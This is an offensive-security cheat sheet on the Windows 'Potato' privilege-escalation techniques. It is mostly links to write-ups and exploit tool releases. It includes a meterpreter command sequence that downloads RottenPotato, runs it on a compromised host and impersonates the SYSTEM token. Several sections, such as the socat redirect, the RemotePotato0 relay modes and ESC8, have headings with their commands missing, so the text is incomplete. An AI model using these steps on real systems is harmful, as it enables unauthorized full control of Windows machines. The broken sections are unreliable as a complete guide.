Potatoes

• https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html

• https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all

RottenPotato

• https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

• https://github.com/foxglovesec/RottenPotato

$ curl -L https://github.com/foxglovesec/RottenPotato/raw/master/rottenpotato.exe > r.exe
meterpreter > upload r.exe
meterpreter > load incognito
meterpreter > execute -cH -f r.exe
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

LonelyPotato

• https://decoder.cloud/2017/12/23/the-lonely-potato/

• https://github.com/decoder-it/lonelypotato

JuicyPotato

• https://ohpe.it/juicy-potato/

• https://ohpe.it/juicy-potato/CLSID/

• https://github.com/ohpe/juicy-potato/releases

• https://github.com/ivanitlearning/Juicy-Potato-x86/releases

RoguePotato

• https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/

• https://github.com/antonioCoco/RoguePotato/releases

Redirect traffic that comes to 135 port on Attacker (10.10.13.37) with socat back to the Victim (192.168.1.11) on port 9999 (RogueOxidResolver is running locally on port 9999 on Victim):

Trigger the potato to run a binary with high privileges (don't forget to start a listener if sending a reverse shell):

RemotePotato0

• https://www.sentinelone.com/labs/relaying-potatoes-another-unexpected-privilege-escalation-vulnerability-in-windows-rpc-protocol/

• https://github.com/antonioCoco/RemotePotato0/releases

Get session ID of the user to pwn:

Hashes collector (modes 2, 3):

Cross-protocol relay (modes 0, 1):

Combining with ESC8:

GenericPotato

• https://micahvandeusen.com/the-power-of-seimpersonation/

• https://github.com/micahvandeusen/GenericPotato

EfsPotato

• https://github.com/zcgonvh/EfsPotato

Tools

SweetPotato

• https://github.com/CCob/SweetPotato

MultiPotato

• https://github.com/S3cur3Th1sSh1t/MultiPotato